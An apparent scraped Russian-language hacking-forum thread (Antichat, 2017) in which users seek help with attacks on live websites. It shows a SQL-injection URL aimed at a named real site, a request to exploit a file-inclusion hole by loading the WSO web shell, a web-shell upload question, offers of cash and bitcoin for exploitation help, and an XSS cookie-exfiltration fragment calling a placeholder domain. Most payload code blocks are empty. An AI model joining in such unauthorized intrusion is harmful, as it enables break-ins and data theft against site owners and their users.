HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.01.2017, 16:35
foozzione
Познающий
Регистрация: 20.12.2016
Сообщений: 74
Провел на форуме:
19301

Репутация: 0
По умолчанию

[QUOTE="SaNDER"]

Error-Based SQL Injection .
WAF фильтрует concat .
*****.**/news.php?id=1 concat
 
Ответить с цитированием

  #2  
Старый 28.01.2017, 23:02
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию

Залить шелл в таких условиях?

Код:
$uploaddir = "img/news/";
$temp=sha1(uniqid()).".jpg";
$uploadfile = $uploaddir . $temp;
move_uploaded_file($_FILES['image']['tmp_name'], $uploadfile);
 
Ответить с цитированием

  #3  
Старый 29.01.2017, 01:20
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
Провел на форуме:
169212

Репутация: 441


По умолчанию

Цитата:
Сообщение от Octavian  

Залить шелл в таких условиях?
Только в фантазиях
 
Ответить с цитированием

  #4  
Старый 29.01.2017, 02:02
foozzione
Познающий
Регистрация: 20.12.2016
Сообщений: 74
Провел на форуме:
19301

Репутация: 0
По умолчанию

есть урл, october cms - https://site.ru/blog/post/name_post

там есть скуля, хочу раскрутить через sqlmap, но чистого роута не знаю, есть спецы по octobercms?

нужно знать урл по типу такого https://site.ru/blog.php?post=name_post
 
Ответить с цитированием

  #5  
Старый 29.01.2017, 03:18
foozzione
Познающий
Регистрация: 20.12.2016
Сообщений: 74
Провел на форуме:
19301

Репутация: 0
По умолчанию

и еще один вопрос, есть lfi:

Код:
Warning: file_exists() expects parameter 1 to be a valid path, string given in /var/www/***/***/***.php on line 3170 Не найден файл: site_func/https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso-4.2.5.php
судя из ошибка пыхи (а пыху знаю 6 лет), в file_exists нельзя пихать строку, требуется файл на сервере, как реализовать? Еще поправка, файлы онли .php подключает.

UPD:

Кстате любой файл исполняется, а не экранируется, конфиги не получить, cms знаю, пути знаю, как извлечь инфу нужную?

Кто поможет раскрутить lfi (url не дам, только варианты пробовать буду), отбрагодарю финансово.

В ЛС могу кинуть уязвимый код на пыхе
 
Ответить с цитированием

  #6  
Старый 01.02.2017, 18:17
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию

Где тут вектор атаки что я делаю нетак http://iucosoft.com/software-development-details.html?place=-desktop'+or+union+select+1,2,3+or+''='8
 
Ответить с цитированием

  #7  
Старый 02.02.2017, 18:05
Elva
Новичок
Регистрация: 01.01.2016
Сообщений: 21
Провел на форуме:
5299

Репутация: 0
По умолчанию

XSS.

Задача обойти фильтр.

Пропускает исключительно

10$ в BTC за результативную помощь в внедрении кода (ЛС).

Сайт №1.

Отправляю:

Код:

Получаю:

Код:

Сайт №2

Отправляю:

Код:

Получаю

Код:

 
Ответить с цитированием

  #8  
Старый 02.02.2017, 19:08
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
Провел на форуме:
169212

Репутация: 441


По умолчанию

Цитата:
Сообщение от Elva  
Синтаксис нарушен img.src = 'https://domen.com/1.gif?', возможно из-за этого парсер ломает структуру. javascript:там не нужен.

Код:

Во втором похоже на белый список атриббутов, фильтр вроде caja.
 
Ответить с цитированием

  #9  
Старый 02.02.2017, 19:08
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
Провел на форуме:
169212

Репутация: 441


По умолчанию

Цитата:
Сообщение от Octavian  

Где тут вектор атаки что я делаю нетак
http://iucosoft.com/software-development-details.html?place=-desktop'+or+union+select+1,2,3+or+''='8
Прочитай любую вводную стаью про SQL Injection.
 
Ответить с цитированием

  #10  
Старый 02.02.2017, 19:27
cyrhaller
Новичок
Регистрация: 18.03.2016
Сообщений: 5
Провел на форуме:
1415

Репутация: 6
По умолчанию

Цитата:
Сообщение от Elva  

XSS.
Задача обойти фильтр.
Пропускает исключительно
10$ в BTC за результативную помощь в внедрении кода (ЛС).
Сайт №1.
Отправляю:
Код:

Получаю:
Код:

Сайт №2
Отправляю:
Код:

Получаю
Код:

1:

Код:

со вторым не факт, что получится, он вырезает лишние параметры из тега
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.